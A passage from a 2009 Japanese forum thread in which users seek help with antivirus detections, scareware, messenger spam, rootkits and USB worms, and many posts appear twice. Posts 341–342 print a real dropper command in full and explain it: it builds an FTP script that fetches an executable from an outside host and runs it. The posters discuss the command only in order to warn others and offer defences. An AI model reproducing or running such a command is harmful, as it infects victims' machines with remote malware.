【ルータの有無】 有
外付けHDDをチェックしたところTROJ Generic.DITが検出されました
トロイの木馬の一種のようですがググってもよく分かりません
これがどのような悪さをするのかご存知の方、教えてください
321 :名無しさん@お腹いっぱい。:2009/01/13(火) 01:21:31
マルチウゼー
322 :名無しさん@お腹いっぱい。:2009/01/13(火) 02:37:58
>>320
マジレスするとJavaScript関係、キャッシュを消せば解決
マジレスするとJavaScript関係、キャッシュを消せば解決
323 :名無しさん@お腹いっぱい。:2009/01/13(火) 03:17:18
>>320
ドライブの復元ポイントに忍び込んでるタイプ。復元ポイントを削除すれば消える
ドライブの復元ポイントに忍び込んでるタイプ。復元ポイントを削除すれば消える
324 :初心者:2009/01/13(火) 19:18:16
RemoteAdmin.Win32.RemotelyAnywhere.o
ってウイルスを検知したんですがどんな悪さをするか教えて欲しいです。
御願いします。
ってウイルスを検知したんですがどんな悪さをするか教えて欲しいです。
御願いします。
325 :名無しさん@お腹いっぱい。:2009/01/13(火) 22:54:25
>>324
今出てる具体的な症状をできるだけ詳細に述べてくれ。ただ個人的にはRemoteAdmin、RemotelyAnywhereってので何となく想像できる
今出てる具体的な症状をできるだけ詳細に述べてくれ。ただ個人的にはRemoteAdmin、RemotelyAnywhereってので何となく想像できる
326 :名無しさん@お腹いっぱい。:2009/01/13(火) 22:57:34
>>319
OS再インスコも覚悟。スキャンで検出できず自力での削除も不可能なら危険、データが無事なうちに早めにする。そのうちブルーの画面が出てPCが攻撃されてますって英語で出てくることもある。
OS再インスコも覚悟。スキャンで検出できず自力での削除も不可能なら危険、データが無事なうちに早めにする。そのうちブルーの画面が出てPCが攻撃されてますって英語で出てくることもある。
327 :名無しさん@お腹いっぱい。:2009/01/13(火) 23:40:16
328 :名無しさん@お腹いっぱい。:2009/01/14(水) 01:25:47
>>327
名前忘れたけど厄介だってのは知ってる。デスクトップに置いてあるデータも被害なく外付けに退避させられるからいいものの・・
確かに超冷や汗ものの一つだな。関わりたくないものの一つだ
こいつはダウンロードものに感染してるんじゃなくて海外サイト経由でひっかかるタイプだった気がする。
未知の海外サイト見る時はaguse gatewayを使った方が無難。危険なところも安全に見れる
今後の参考にしてくれ。多分最近見たサイトのどれかのはずだ
名前忘れたけど厄介だってのは知ってる。デスクトップに置いてあるデータも被害なく外付けに退避させられるからいいものの・・
確かに超冷や汗ものの一つだな。関わりたくないものの一つだ
こいつはダウンロードものに感染してるんじゃなくて海外サイト経由でひっかかるタイプだった気がする。
未知の海外サイト見る時はaguse gatewayを使った方が無難。危険なところも安全に見れる
今後の参考にしてくれ。多分最近見たサイトのどれかのはずだ
329 :名無しさん@お腹いっぱい。:2009/01/14(水) 01:31:28
【使用OS】 Windows XP pro
【Microsoft Update(MU)の状態】 sp3にしてない状態
【使用セキュリティソフトとバージョン】 カスペアンチウイルス2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果】検出なし
最近system32にb33r06hF.exe.a_aとかmqM471x7.exe.a_aというファイルがたびたび出現します。
mqM471x7の方ができた場合、IEが自動起動・自動closeが3分おきくらいに繰り返されます。
スパイウェアなような気もしますが、
ぐぐっても特に情報が見つからなかったため、とりあえずこちらに書かせていただきました。
もし何かご存知の方おりましたら、情報いただけませんか?
【Microsoft Update(MU)の状態】 sp3にしてない状態
【使用セキュリティソフトとバージョン】 カスペアンチウイルス2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果】検出なし
最近system32にb33r06hF.exe.a_aとかmqM471x7.exe.a_aというファイルがたびたび出現します。
mqM471x7の方ができた場合、IEが自動起動・自動closeが3分おきくらいに繰り返されます。
スパイウェアなような気もしますが、
ぐぐっても特に情報が見つからなかったため、とりあえずこちらに書かせていただきました。
もし何かご存知の方おりましたら、情報いただけませんか?
330 :名無しさん@お腹いっぱい。:2009/01/14(水) 02:04:57
>>329
つttp://www.google.co.jp/search?hl=ja&rlz=1T4GGLJ_jaJP256JP264&q=exe.a_a&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
つttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_FIRU.BG&VSect=T
つttp://www.google.co.jp/search?hl=ja&rlz=1T4GGLJ_jaJP256JP264&q=exe.a_a&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
つttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_FIRU.BG&VSect=T
331 :名無しさん@お腹いっぱい。:2009/01/14(水) 09:55:15
332 :名無しさん@お腹いっぱい。:2009/01/14(水) 20:08:26
333 :名無しさん@お腹いっぱい。:2009/01/14(水) 22:08:13
334 :通りすがり:2009/01/14(水) 23:26:11
私もこの〔TROJ_Generic.DIT〕が名無しさんと同じファイル
〔午後のこ〜だ〕と〔CyberLink PowerDVD〕+〔ジャストシステム〕で検出されましたので
トレンドマイクロに問い合わせ、指示に従いそのファイルを添付して調べてもらったところ
下記のような回答が来ました。
*****************************
今回検出されたファイルにつきましては、弊社にて解析の結果、
正常なファイルであると確認できましたので、ウイルスバスターの
誤検出となります。
現在はパターンファイル[5.767.50]にて修正済ですので、アップデート
を行っていただき検出されないか、ご確認いただきますようお願い
いたします。
*****************************
と言うことでしたので、実行するとすべてOKでした。
ウイルスバスター2009の誤検出だっただけのようです。
〔午後のこ〜だ〕と〔CyberLink PowerDVD〕+〔ジャストシステム〕で検出されましたので
トレンドマイクロに問い合わせ、指示に従いそのファイルを添付して調べてもらったところ
下記のような回答が来ました。
*****************************
今回検出されたファイルにつきましては、弊社にて解析の結果、
正常なファイルであると確認できましたので、ウイルスバスターの
誤検出となります。
現在はパターンファイル[5.767.50]にて修正済ですので、アップデート
を行っていただき検出されないか、ご確認いただきますようお願い
いたします。
*****************************
と言うことでしたので、実行するとすべてOKでした。
ウイルスバスター2009の誤検出だっただけのようです。
335 :名無しさん@お腹いっぱい。:2009/01/15(木) 00:59:31
すみません。
WORM-VB.Ciiというウイルスがウイルスバスターで検出されたんですが、
どんな悪さをするんでしょうか?
目立った不具合は特にないのですが、パソコン(今年で五年目)の動きが遅く感じます。
教えてください。よろしくお願いいたします。
WORM-VB.Ciiというウイルスがウイルスバスターで検出されたんですが、
どんな悪さをするんでしょうか?
目立った不具合は特にないのですが、パソコン(今年で五年目)の動きが遅く感じます。
教えてください。よろしくお願いいたします。
336 :名無しさん@お腹いっぱい。:2009/01/15(木) 10:47:32
ウイルスバスターの検出名じゃないと思うんだが。
337 :初心者:2009/01/15(木) 11:19:36
>>325さん
具体的な被害はないねんけど、ウィルスセキュリティをかけたら感染してますって出たんです。
実害はないんですが一応感染してる物をアンインストールしてもう一回セキュリティをかけたら出てこなくなりました。
もう大丈夫なんかな?
具体的な被害はないねんけど、ウィルスセキュリティをかけたら感染してますって出たんです。
実害はないんですが一応感染してる物をアンインストールしてもう一回セキュリティをかけたら出てこなくなりました。
もう大丈夫なんかな?
338 :名無しさん@お腹いっぱい。:2009/01/15(木) 11:24:20
>>335
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_VB.CII&VSect=T
最近流行りのUSBメモリなどを介して感染するウイルス。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_VB.CII&VSect=T
最近流行りのUSBメモリなどを介して感染するウイルス。
339 :名無しさん@お腹いっぱい。:2009/01/15(木) 12:34:39
Uかよ…・
340 :名無しさん@お腹いっぱい。:2009/01/15(木) 12:52:16
>>335これってキンタマとか山田とか苺キンタマみたいな悪質なもの?
341 :名無しさん@お腹いっぱい。:2009/01/15(木) 14:02:11
既出だったらごめんよ。
たまーにググるとヒットする「FireFoxUpdater.exe」の情報。
winmgmt(Windows Management Instrumentation)のセキュリティーホールを突い
て外部から潜り込ませるらしい。
以下詳細
まず、外部からwinmgmtを使って以下のコマンドを実行する。
cmd /c echo open b.nvgao.cn>%WINDIR%\WindowsGard&& echo hai
>>%WINDIR%\WindowsGard&& echo 123
>>%WINDIR%\WindowsGard&& echo binary
>>%WINDIR%\WindowsGard&& echo get 8888888888888.exe %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WindowsGard&& echo bye
>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat
>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard
>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat
>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat
※ 実際は改行無しの一行
わかる人はわかると思うが、上記の一行で以下の3つのファイル%WINDIR%(通常はC:\WINNTだね。)が作成され、、、
WinA.bat
WindowsGard
WinF.bat
たまーにググるとヒットする「FireFoxUpdater.exe」の情報。
winmgmt(Windows Management Instrumentation)のセキュリティーホールを突い
て外部から潜り込ませるらしい。
以下詳細
まず、外部からwinmgmtを使って以下のコマンドを実行する。
cmd /c echo open b.nvgao.cn>%WINDIR%\WindowsGard&& echo hai
>>%WINDIR%\WindowsGard&& echo 123
>>%WINDIR%\WindowsGard&& echo binary
>>%WINDIR%\WindowsGard&& echo get 8888888888888.exe %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WindowsGard&& echo bye
>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat
>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard
>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat
>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat
※ 実際は改行無しの一行
わかる人はわかると思うが、上記の一行で以下の3つのファイル%WINDIR%(通常はC:\WINNTだね。)が作成され、、、
WinA.bat
WindowsGard
WinF.bat
342 :名無しさん@お腹いっぱい。:2009/01/15(木) 14:03:09
>>341続き
最後にWinF.batが実行される。
そしてこのWinF.batが(上記を見れば分かると思うがw)
ftp -s:C:\WINNT\WindowsGard
C:\WINNT\FireFoxUpdater.exe
del C:\WINNT\WindowsGard
cmd /c C:\WINNT\WinA.bat
del C:\WINNT\WinF.bat
ftp -sでコマンドファイルを指定している。そしてWindowsGardの中身が(上記を見れば分かると思うがw)
open b.nvgao.cn
hai
123
binary
get 8888888888888.exe C:\WINNT\FireFoxUpdater.exe
bye
分かる人は、b.nvgao.cnで暴るのも(ry
で、FireFoxUpdater.exeをゲット完了後に即実行し・・・・
後はもうやりたい放題にやられちゃうと思います。
防御方法
Windows Management InstrumentationとWindows Management Instrumentation Driver Extensionsのサービス
を無効にする。
ftpコマンド名を変更する(moeftp.exeとかww)
最後にWinF.batが実行される。
そしてこのWinF.batが(上記を見れば分かると思うがw)
ftp -s:C:\WINNT\WindowsGard
C:\WINNT\FireFoxUpdater.exe
del C:\WINNT\WindowsGard
cmd /c C:\WINNT\WinA.bat
del C:\WINNT\WinF.bat
ftp -sでコマンドファイルを指定している。そしてWindowsGardの中身が(上記を見れば分かると思うがw)
open b.nvgao.cn
hai
123
binary
get 8888888888888.exe C:\WINNT\FireFoxUpdater.exe
bye
分かる人は、b.nvgao.cnで暴るのも(ry
で、FireFoxUpdater.exeをゲット完了後に即実行し・・・・
後はもうやりたい放題にやられちゃうと思います。
防御方法
Windows Management InstrumentationとWindows Management Instrumentation Driver Extensionsのサービス
を無効にする。
ftpコマンド名を変更する(moeftp.exeとかww)
343 :名無しさん@お腹いっぱい。:2009/01/15(木) 14:44:53
>>342
FireFoxUpdater.exeという名前のウィルスなのですか?
FireFoxUpdater.exeという名前のウィルスなのですか?
344 :名無しさん@お腹いっぱい。:2009/01/15(木) 15:18:23
うわぁ・・・
345 :名無しさん@お腹いっぱい。:2009/01/16(金) 00:49:31
マルウェア対策でフリーソフトのcomodo boなんとかっての使っているが常駐でウップデートした奴を勝手に削除する素晴らしい糞です。
346 :名無しさん@お腹いっぱい。:2009/01/19(月) 12:15:08
347 :名無しさん@お腹いっぱい。:2009/01/20(火) 18:09:02
質問させて頂きます。
今まで使用してきたESET SmartSecrityの期限が切れまして、
PCを購入した為1ライセンスで2台使用できるセキュリティソフトを探しております。
PCの用途は専らオンラインゲームか動画鑑賞のみです。
メインPCのCPUはCore2Duo E8600で、メモリは4Gです。
サブPCはAthlon 64 X2 3800+のメモリ1Gです。
今まではサブをメインとして使用しており、そちらにセキュリティソフトを入れていました。
なので現在はメインPCにESET SmartSecrityの体験版、サブPCに期限切れのESET SmartSecrityを入れています。
サブPCは毎日起動しないので、もし無料のavast等でも事足りるのであれば、
メインに有料のソフト、サブに無料ソフトでもかまいません。
オンラインゲームをやることが非常に多いので、アカウントハック等を防げたらいいのですが・・・
PCに関しての知識は疎いので、あまり深いところまではわかりません。
長文・乱文で申し訳ありませんが、どうかよろしくお願いいたします。
【使用OS】 WindowsXP Home SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ESET SmartSecrity
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ESET SmartSecrity
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
今まで使用してきたESET SmartSecrityの期限が切れまして、
PCを購入した為1ライセンスで2台使用できるセキュリティソフトを探しております。
PCの用途は専らオンラインゲームか動画鑑賞のみです。
メインPCのCPUはCore2Duo E8600で、メモリは4Gです。
サブPCはAthlon 64 X2 3800+のメモリ1Gです。
今まではサブをメインとして使用しており、そちらにセキュリティソフトを入れていました。
なので現在はメインPCにESET SmartSecrityの体験版、サブPCに期限切れのESET SmartSecrityを入れています。
サブPCは毎日起動しないので、もし無料のavast等でも事足りるのであれば、
メインに有料のソフト、サブに無料ソフトでもかまいません。
オンラインゲームをやることが非常に多いので、アカウントハック等を防げたらいいのですが・・・
PCに関しての知識は疎いので、あまり深いところまではわかりません。
長文・乱文で申し訳ありませんが、どうかよろしくお願いいたします。
【使用OS】 WindowsXP Home SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ESET SmartSecrity
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ESET SmartSecrity
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
348 :名無しさん@お腹いっぱい。:2009/01/20(火) 18:34:00
349 :名無しさん@お腹いっぱい。:2009/01/20(火) 23:24:46
>>347
セキュリティーに興味を持って調べてこの板に来たんだからもうちょっと頑張って
性能のいいフリーソフトを使ってみてはどうでしょう(あと若干スレチな気もします)
参考までに↓
【無料】 フリーセキュリティの組合せ 9
http://pc11.2ch.net/test/read.cgi/sec/1231757789
ちなみにどんなに頑張っても感染するときは気付かずいつの間にかかかるので
あまり神経質になりすぎてもどうかとは思います。
肝心なのは自分にとって使いやすい、きちんと設定できてなるべく検出率が良い
ソフトを使うことだと思います。
あと個人的にESETはよろしくないかと・・・・
E8600ならガチガチにセキュリティー固めても起動時以外で重さを体感出来ることはないので
軽さで選ぶのはやめたほうがいいと思います。(FPS上級者で1ドット単位で狙える人なら別ですが)
セキュリティーに興味を持って調べてこの板に来たんだからもうちょっと頑張って
性能のいいフリーソフトを使ってみてはどうでしょう(あと若干スレチな気もします)
参考までに↓
【無料】 フリーセキュリティの組合せ 9
http://pc11.2ch.net/test/read.cgi/sec/1231757789
ちなみにどんなに頑張っても感染するときは気付かずいつの間にかかかるので
あまり神経質になりすぎてもどうかとは思います。
肝心なのは自分にとって使いやすい、きちんと設定できてなるべく検出率が良い
ソフトを使うことだと思います。
あと個人的にESETはよろしくないかと・・・・
E8600ならガチガチにセキュリティー固めても起動時以外で重さを体感出来ることはないので
軽さで選ぶのはやめたほうがいいと思います。(FPS上級者で1ドット単位で狙える人なら別ですが)
350 :名無しさん@お腹いっぱい。:2009/01/21(水) 03:15:27
http://www7a.biglobe.ne.jp/~dokyo/newpage74.html
↑のアドレスのサイトにとんだ瞬間にW32.Aliz.Wormというウィルスに
感染したとのメッセージが出てきて
コンピューターウイルスW32.Aliz.Wormのダウンロードが完了しました。
このウイルスはハードディスク内のメモリー内を常に移動するようプログラムされているのでウイルスを駆除することは非常に
困難です。又、非常に感染性が高いのでネットワークを通して次から次へと感染ファイルを増やします。尚、このウイルスには
最初のページでの貴方個人情報を載せてありますのでインターネット上に貴方の個人情報を広めます。
プロパイダから損害賠償など多額な請求が来る可能性があります。ダイアルQ2に接続しましたので回線を切断しても
IPが残るので半永久的に請求が行われます。
更に詳しい詳細は下の詳細ボタンを押してください。
という文の書かれたページに飛んだのですが
本当に感染してしまったのでしょうか?
確認する術を知らないので皆さんのご助力を得たいのですが・・・。
↑のアドレスのサイトにとんだ瞬間にW32.Aliz.Wormというウィルスに
感染したとのメッセージが出てきて
コンピューターウイルスW32.Aliz.Wormのダウンロードが完了しました。
このウイルスはハードディスク内のメモリー内を常に移動するようプログラムされているのでウイルスを駆除することは非常に
困難です。又、非常に感染性が高いのでネットワークを通して次から次へと感染ファイルを増やします。尚、このウイルスには
最初のページでの貴方個人情報を載せてありますのでインターネット上に貴方の個人情報を広めます。
プロパイダから損害賠償など多額な請求が来る可能性があります。ダイアルQ2に接続しましたので回線を切断しても
IPが残るので半永久的に請求が行われます。
更に詳しい詳細は下の詳細ボタンを押してください。
という文の書かれたページに飛んだのですが
本当に感染してしまったのでしょうか?
確認する術を知らないので皆さんのご助力を得たいのですが・・・。
351 :名無しさん@お腹いっぱい。:2009/01/21(水) 03:21:10
352 :名無しさん@お腹いっぱい。:2009/01/21(水) 11:31:02
てかそんなアドレス直リンすんなよボケ!
そんなサイトどうせ詐欺サイトなんじゃねーの
そんなサイトどうせ詐欺サイトなんじゃねーの
353 :名無しさん@お腹いっぱい。:2009/01/21(水) 13:21:17
(・◎・)免許の更新にいってくる
354 :名無しさん@お腹いっぱい。:2009/01/21(水) 13:22:03
>>353
誤爆乙
誤爆乙
355 :名無しさん@お腹いっぱい。:2009/01/21(水) 15:23:17
356 :名無しさん@お腹いっぱい。:2009/01/21(水) 16:23:49
今XPをクリーンインストールした直後なんですが、
STOP! SYSTEM MAY REQUIRE IMMEDIATE ATTENTION
Your operating system registry may have errors or be corupt.
以下略
といった内容でRestorefix.comへの誘導の書かれたウィンドウが表示されました。
メッセンジャースパムというものらしいですが
そこに書かれたアドレスにアクセスしなければ平気なんでしょうか?
ドライバ等のアップデートを済ませてこれからXPの更新するところで
アンチウィルスソフトもまだ入れてない状態なのであまりググるのも危険な感じがして不安なんですが・・・。
このままアップデート作業進めて大丈夫なんだろうか・・・。
STOP! SYSTEM MAY REQUIRE IMMEDIATE ATTENTION
Your operating system registry may have errors or be corupt.
以下略
といった内容でRestorefix.comへの誘導の書かれたウィンドウが表示されました。
メッセンジャースパムというものらしいですが
そこに書かれたアドレスにアクセスしなければ平気なんでしょうか?
ドライバ等のアップデートを済ませてこれからXPの更新するところで
アンチウィルスソフトもまだ入れてない状態なのであまりググるのも危険な感じがして不安なんですが・・・。
このままアップデート作業進めて大丈夫なんだろうか・・・。
357 :名無しさん@お腹いっぱい。:2009/01/21(水) 16:42:18
>>356
メンセンジャースパムはXP標準のサービス機能を悪用して行なわれるスパム
デフォルトではMessengerサービスがONの状態になっているので
手動でOFFにすれば今後届くようなこともない。
ttp://www.atmarkit.co.jp/fsecurity/rensai/securitytips/010messenger.html
ついでに言っとくが
リモートアシスタンスやゲストユーザーアカウントも確認して置くように
ONになってると色々まずい
あとサービスのいじり方に慣れたのなら、不要なサービスはOFFにしておくと
安全性は高まる。
メンセンジャースパムはXP標準のサービス機能を悪用して行なわれるスパム
デフォルトではMessengerサービスがONの状態になっているので
手動でOFFにすれば今後届くようなこともない。
ttp://www.atmarkit.co.jp/fsecurity/rensai/securitytips/010messenger.html
ついでに言っとくが
リモートアシスタンスやゲストユーザーアカウントも確認して置くように
ONになってると色々まずい
あとサービスのいじり方に慣れたのなら、不要なサービスはOFFにしておくと
安全性は高まる。
358 :名無しさん@お腹いっぱい。:2009/01/22(木) 07:54:41
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンしてウィルスを発見したわけではなく、 1/21の夜から今現在まで
ウィルスバスターがしきりに不正変更を拒否しましたとポップアップを表示するようになりました。
【種類】 APIEvent
【検出リソース/プロセスID】 ZwWriteVirtualMemory
【ファイル名】 (空白)
【該当ポリシー】 DLL(プログラムライブラリ)インジェクション
【実行した処理】 確認&拒否
ttp://oshiete1.goo.ne.jp/qa4649268.html
教えてgooにもまったく同様の症状を訴えている人がいて
回答にある参考URL(トレンドマイクロの対策ページ)を元に原因を探しているのですが、
感染したことを示すファイル類は検索で見つかっていません。
ほぼ同時期に発症しているため気味が悪いのですが、どのように対処をすべきなのでしょうか。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンしてウィルスを発見したわけではなく、 1/21の夜から今現在まで
ウィルスバスターがしきりに不正変更を拒否しましたとポップアップを表示するようになりました。
【種類】 APIEvent
【検出リソース/プロセスID】 ZwWriteVirtualMemory
【ファイル名】 (空白)
【該当ポリシー】 DLL(プログラムライブラリ)インジェクション
【実行した処理】 確認&拒否
ttp://oshiete1.goo.ne.jp/qa4649268.html
教えてgooにもまったく同様の症状を訴えている人がいて
回答にある参考URL(トレンドマイクロの対策ページ)を元に原因を探しているのですが、
感染したことを示すファイル類は検索で見つかっていません。
ほぼ同時期に発症しているため気味が悪いのですが、どのように対処をすべきなのでしょうか。
359 :名無しさん@お腹いっぱい。:2009/01/22(木) 16:45:55
んーネトゲやってる?
361 :名無しさん@お腹いっぱい。:2009/01/22(木) 23:27:11
362 :名無しさん@お腹いっぱい。:2009/01/22(木) 23:37:14
まあ、簡単に言えばnProtectの関係かなぁ、と漠然と思ってるのですが。
自分ネトゲしてないのでよく判らんのです……
試験的に除外してみてもいいかも
自分ネトゲしてないのでよく判らんのです……
試験的に除外してみてもいいかも
363 :名無しさん@お腹いっぱい。:2009/01/22(木) 23:41:37
まあ、あげとく
結局今回の動作の原因は分からず、再起動をしたら症状は治まりました。
最終的にウイルスバスターのセキュリティーレポートを確認すると
二日間で425件の不正変更の監視、その内ほぼ全てが確認と拒否でしたが
ZwWriteVirtualMemoryに二回の許可。
ZwCreateThreadに一回の許可がありました。
セーフモードでAdAwareとウイルスバスターを走らせましたが
原因となるプログラムも検出されませんでした。
最終的にウイルスバスターのセキュリティーレポートを確認すると
二日間で425件の不正変更の監視、その内ほぼ全てが確認と拒否でしたが
ZwWriteVirtualMemoryに二回の許可。
ZwCreateThreadに一回の許可がありました。
セーフモードでAdAwareとウイルスバスターを走らせましたが
原因となるプログラムも検出されませんでした。
365 :名無しさん@お腹いっぱい。:2009/01/24(土) 15:15:27
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
「送信メールを検索しました」ってでるんだがどういう状況ですか?
366 :名無しさん@お腹いっぱい。:2009/01/24(土) 17:51:13
>>358
いずれにせよそれって活動を隠すための手続きだと思うんですよ
ネットゲームのSecurityプログラムなども一部でそういう動きするらしく、
少し前に騒ぎになったこともあったと思うんですけども……
ただ、気になるのはrootkit系ウイルスも良くそういう活動をしたと思うんだよなぁ
ま、このままだとちょっと手が出ないので、アダ被で解析を依頼されて見てはいかがでしょうか?
いずれにせよそれって活動を隠すための手続きだと思うんですよ
ネットゲームのSecurityプログラムなども一部でそういう動きするらしく、
少し前に騒ぎになったこともあったと思うんですけども……
ただ、気になるのはrootkit系ウイルスも良くそういう活動をしたと思うんだよなぁ
ま、このままだとちょっと手が出ないので、アダ被で解析を依頼されて見てはいかがでしょうか?
367 :名無しさん@お腹いっぱい。:2009/01/24(土) 17:57:32
987 :名無しさん@お腹いっぱい。:2009/01/24(土) 15:14:00
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
368 :名無しさん@お腹いっぱい。:2009/01/24(土) 22:16:13
【使用OS】Windows XP
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】ウイルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
TROJ_TDSS.AXLN
C:\DOCUME~1\●● ~1\LOCALS~1\Temp\TDSScf7d.tmp
制限付のアカウントでは動作できるのですが、
管理者でログインするとデスクトップが表示されたままになります。
クリックやキー操作を受け付けません。
対策法を教えて頂けないでしょうか。
宜しくお願いします。
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】ウイルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
TROJ_TDSS.AXLN
C:\DOCUME~1\●● ~1\LOCALS~1\Temp\TDSScf7d.tmp
制限付のアカウントでは動作できるのですが、
管理者でログインするとデスクトップが表示されたままになります。
クリックやキー操作を受け付けません。
対策法を教えて頂けないでしょうか。
宜しくお願いします。
369 :名無しさん@お腹いっぱい。:2009/01/25(日) 00:19:16
>>368
セーフモードで同じ? タスクバーは表示されてる?
タスクバーが表示されてなかったら、Ctrl+Shift+Escでタスクマネージャを起動して
「ファイル」->「新しいタスクの実行」で「explorer.exe」を起動してみて。
管理者でログイン出来たら、AVG Anti-Rootkitでスキャンして。
AVG Anti-Rootkit
ttp://www.softpedia.com/get/Antivirus/AVG-Anti-Rootkit.shtml
セーフモードで同じ? タスクバーは表示されてる?
タスクバーが表示されてなかったら、Ctrl+Shift+Escでタスクマネージャを起動して
「ファイル」->「新しいタスクの実行」で「explorer.exe」を起動してみて。
管理者でログイン出来たら、AVG Anti-Rootkitでスキャンして。
AVG Anti-Rootkit
ttp://www.softpedia.com/get/Antivirus/AVG-Anti-Rootkit.shtml
370 :名無しさん@お腹いっぱい。:2009/01/25(日) 02:13:37
>>365
P2P使ってるから
P2P使ってるから
372 :名無しさん@お腹いっぱい。:2009/01/25(日) 16:14:21
オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
自分のパソコンからUSBにウィルスは移るんでしょうか?
自分のパソコンからUSBにウィルスは移るんでしょうか?
373 :名無しさん@お腹いっぱい。:2009/01/26(月) 04:21:04
>>372
書き込みが日本語になってないから聞きたいことが良くわからんが……
オートランの拡散経路だけ説明だけする。
オートラン系のウイルス本体は、まずパソコンに感染する。
原因はさまざま。一番多いのはサイトからの感染だと言われてる。
で、そのあウイルスは感染PCに繋がれたUSBメモリに分身をコピーしてUSBを感染させ
その感染したUSBを媒介に、他のPCにも自分のコピーを広けると言う寸法。
以前は一つのファイルをブロックできれば無力化できたんだけど、
感染方法を変えやがったらしいから注意な。
しかし妙に対応が早いし、このウイルスの動きは奇妙。
書き込みが日本語になってないから聞きたいことが良くわからんが……
オートランの拡散経路だけ説明だけする。
オートラン系のウイルス本体は、まずパソコンに感染する。
原因はさまざま。一番多いのはサイトからの感染だと言われてる。
で、そのあウイルスは感染PCに繋がれたUSBメモリに分身をコピーしてUSBを感染させ
その感染したUSBを媒介に、他のPCにも自分のコピーを広けると言う寸法。
以前は一つのファイルをブロックできれば無力化できたんだけど、
感染方法を変えやがったらしいから注意な。
しかし妙に対応が早いし、このウイルスの動きは奇妙。
374 :名無しさん@お腹いっぱい。:2009/01/26(月) 20:46:21
誰か、google-redirectに感染した場合の対処方法を教えてくれ。
検索しても英語サイトばかりでわかんね。
検索しても英語サイトばかりでわかんね。
375 : ◆N9P3SuvBPo :2009/01/26(月) 20:55:26
>374
>google-redirect
WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
googleに繋がるというものですね。
それなら『AVG Anti-Rootkit』が効果がありますよ。
お試しあれ
>google-redirect
WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
googleに繋がるというものですね。
それなら『AVG Anti-Rootkit』が効果がありますよ。
お試しあれ
376 :名無しさん@お腹いっぱい。:2009/01/26(月) 21:15:37
>>372
確かに373の言うとおり、質問が判りにくいなw
>オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
